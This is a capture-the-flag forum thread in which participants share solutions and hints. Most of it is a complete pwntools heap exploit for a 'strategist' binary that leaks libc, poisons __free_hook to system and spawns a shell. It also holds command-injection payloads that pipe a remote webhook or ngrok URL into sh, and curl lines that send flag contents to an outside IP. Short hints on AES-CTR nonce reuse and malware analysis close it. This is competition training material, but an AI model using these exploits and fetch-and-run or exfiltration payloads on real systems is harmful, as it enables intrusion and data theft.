[adyadam]

from pwn import *
elf = ELF("./strategist")
context.binary = elf
#context.terminal = ['tmux', 'splitw', '-hp', '70']
libc = ELF("./glibc/libc.so.6")
ld = ELF("./glibc/ld-linux-x86-64.so.2")
def logbase(): log.info("libc base = %#x" % libc.address)
def logleak(name, val):  log.info(name+" = %#x" % val)
def start():
    if args.REMOTE:
        return remote("ip",port)
    if args.GDB:
        return gdb.debug([elf.path], gdbscript=gs)
    else:
        return process([elf.path])
p = start()
pause()
def newRecvall(_t=10):
    data = b""
    while True:
        try:
            chunk = p.recv(timeout=_t)
            if not chunk:
                break
            data += chunk
        except EOFError:
            break
    log.info(hexdump(data))
    return data
def newSendline(send):
    log.info(b'SENDING: ' + send)
    log.info(hexdump(send))
    p.sendline(send)
def newRecvuntilAndSendline(until, send, _t=10):
    data = b""
    while True:
        try:
            chunk = p.recv(timeout=_t)
            if not chunk:
                break
            data += chunk
            if until in data:
                break
        except EOFError:
            break
    log.info(hexdump(data))
    newSendline(send)
def newSend(send):
    log.info(b'SENDING: ' + send)
    log.info(hexdump(send))
    p.send(send)
def newRecvuntilAndSend(until, send, _t=10):
    data = b""
    while True:
        try:
            chunk = p.recv(timeout=_t)
            if not chunk:
                break
            data += chunk
            if until in data:
                break
        except EOFError:
            break
    log.info(hexdump(data))
    newSend(send)
def predict_heap_size(requested_bytes):
    overhead = 16      # bytes for bookkeeping metadata
    alignment = 16      # alignment requirement
    total_size = requested_bytes + overhead
    if total_size % alignment == 0:
        aligned_size = total_size
    else:
        aligned_size = ((total_size // alignment) + 1) * alignment
    header_value = aligned_size | 1
    return header_value
log.info(hex(predict_heap_size(57)))
# step 1: leak libc
# create 1st plan
newRecvuntilAndSendline(b'> ', b'1')
newRecvuntilAndSendline(b'How long will be your plan?', b'1280')
newRecvuntilAndSendline(b'Please elaborate on your plan.', b'A'*1279)
# create 2nd plan
newRecvuntilAndSendline(b'> ', b'1')
newRecvuntilAndSendline(b'How long will be your plan?', b'32')
newRecvuntilAndSendline(b'Please elaborate on your plan.', b'B'*31)
# delete 1st plan
newRecvuntilAndSendline(b'> ', b'4')
newRecvuntilAndSendline(b'Which plan you want to delete?', b'0')
# recreate 1st plan
newRecvuntilAndSendline(b'> ', b'1')
newRecvuntilAndSendline(b'How long will be your plan?', b'1280')
newRecvuntilAndSendline(b'Please elaborate on your plan.', b'C'*8)
# show 1st plan
newRecvuntilAndSendline(b'> ', b'2')
newRecvuntilAndSendline(b'Which plan you want to view?', b'0', _t=5)
libc_addr_leak = int.from_bytes(newRecvall(_t=5)[0x36:0x3c], byteorder='little')
log.info(b'libc_addr_leak: ')
log.info(hex(libc_addr_leak))
libc.address = libc_addr_leak - 0x3EBC0A
log.info(b'libc.address: ')
log.info(hex(libc.address))
free_hook = libc.sym['__free_hook']
log.info(b'free_hook: ')
log.info(hex(free_hook))
system_addr = libc.sym['system']
log.info(b'system_addr: ')
log.info(hex(system_addr))
pause()
# step 2: create 3rd,4th,5th
# create 3rd plan
newSendline(b'1')
newRecvuntilAndSendline(b'How long will be your plan?', b'40')
newRecvuntilAndSendline(b'Please elaborate on your plan.', b'D'*39)
pause()
# create 4th plan
newRecvuntilAndSendline(b'> ', b'1')
newRecvuntilAndSendline(b'How long will be your plan?', b'57')
newRecvuntilAndSendline(b'Please elaborate on your plan.', b'E'*56)
pause()
# create 5th plan
newRecvuntilAndSendline(b'> ', b'1')
newRecvuntilAndSendline(b'How long will be your plan?', b'40')
newRecvuntilAndSendline(b'Please elaborate on your plan.', b'F'*39)
pause()
# edit 3rd plan to overflow to 4th plan's metadata (size)
newRecvuntilAndSendline(b'> ', b'3')
newRecvuntilAndSendline(b'Which plan you want to change?', b'2')
newRecvuntilAndSend(b'Please elaborate on your new plan.', b'G'*40 + b'\x61')
pause()
# delete 5th plan
newRecvuntilAndSendline(b'> ', b'4')
newRecvuntilAndSendline(b'Which plan you want to delete?', b'4')
pause()
# delete 4th plan
newRecvuntilAndSendline(b'> ', b'4')
newRecvuntilAndSendline(b'Which plan you want to delete?', b'3')
# recreate 4th plan
newRecvuntilAndSendline(b'> ', b'1')
newRecvuntilAndSendline(b'How long will be your plan?', b'88')
newRecvuntilAndSend(b'Please elaborate on your plan.', b'H'*80 + p64(free_hook))
pause()
# create 7th plan
newRecvuntilAndSendline(b'> ', b'1')
newRecvuntilAndSendline(b'How long will be your plan?', b'40')
newRecvuntilAndSendline(b'Please elaborate on your plan.', b'X'*8)
pause()
# create 7th plan
newRecvuntilAndSendline(b'> ', b'1')
newRecvuntilAndSendline(b'How long will be your plan?', b'40')
newRecvuntilAndSendline(b'Please elaborate on your plan.', p64(system_addr))
pause()
newRecvuntilAndSendline(b'> ', b'1')
newRecvuntilAndSendline(b'How long will be your plan?', b'40')
newRecvuntilAndSend(b'Please elaborate on your plan.', b'/bin/sh\0')
pause()
newRecvuntilAndSendline(b'> ', b'4')
newRecvuntilAndSendline(b'Which plan you want to delete?', b'6')
p.interactive()
strategist code

I tried it but I don't get any flag

Have you entered your IP and port? Did you run the remote part? Have you clicked through until interactive mode? Have you tried 'ls'?

Sorry my bad. I haven't realized I need to type shell commands

[oyfyic]

on the command injection, if you are curling a https address you need `curl%2b--location%2bx.x.x.x.ngrok-free.app|sh` otherwise it won't follow the redirect

I am using the payload:
$ curl 'http://docker-ip:docker-port/cgi-bin/attack-domain?target=-&name=a%0d%0aLocation:+/a%0d%0aContent-Type:+proxy:http://127.0.0.1/cgi-bin/attack-ip%3ftarget=::1%$(curl%2b--location%2bhttps://webhook.site/<WEBHOOKID>|sh)%26name=%0d%0a%0d%0a'
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="../?error=Hey /var/www/html/a, watch it!">here</a>.</p>
<hr>
<address>Apache/2.4.54 (Debian) Server at 127.0.0.1 Port 80</address>
</body></html>

Still not working. Kindly assist

While working on this challenge, I had some issues with the '/'. Even tho I encoded it 2 times, it was kinda still not working. So instead I used a solve like this :
curl+xx.xx.xx.xx?a=$(ls) just avoid doing any kind of '/', here's the solve :
curl+xx.xx.xx.xx?a=$(cd .. && cd .. && cd .. && cat flag*)
also remember to double encode this.

hey are you able to provide the full payload? i tried a few thighs but it doesnt work

I used the payload provided by S3d4tion in the thread. Worked like a charm

[sdksdk]

please some help with traces on crypto i hate this category

[puppyshoes]

please some help with traces on crypto i hate this category

The server encrypts every message with AES‑CTR using the same key and nonce, so all messages share the same keystream. Some messages are easy to guess (like “!nick Doomfang”), so XOR the ciphertext for that command with the guess to get the keystream. That gets you started, then use crib dragging to decrypt all messages.

[unrecognized]

someone has the flag of hillside haven?

https://www.google.com/maps/place/Oak+Vi...FQAw%3D%3D

[unkn0wn_user404]

Can someone give me a hint for Silent Trap, scheduled task? I have no idea where to search for. Tried decompiling the malware too.

[nnrrkk]

Can someone give me a hint for Silent Trap, scheduled task? I have no idea where to search for. Tried decompiling the malware too.

stream 34, u need decrypt it

[unkn0wn_user404]

Does it have something with this string? SUPPORTHUB_dev-support_Microsoft Windows NT 6.2.9200.0

[kapiszon]

With silent trap there is a lot of decoding. You have to analyze the downloaded files .

[nnrrkk]

Does it have something with this string? SUPPORTHUB_dev-support_Microsoft Windows NT 6.2.9200.0

nope is a powershell cmd to setup sch task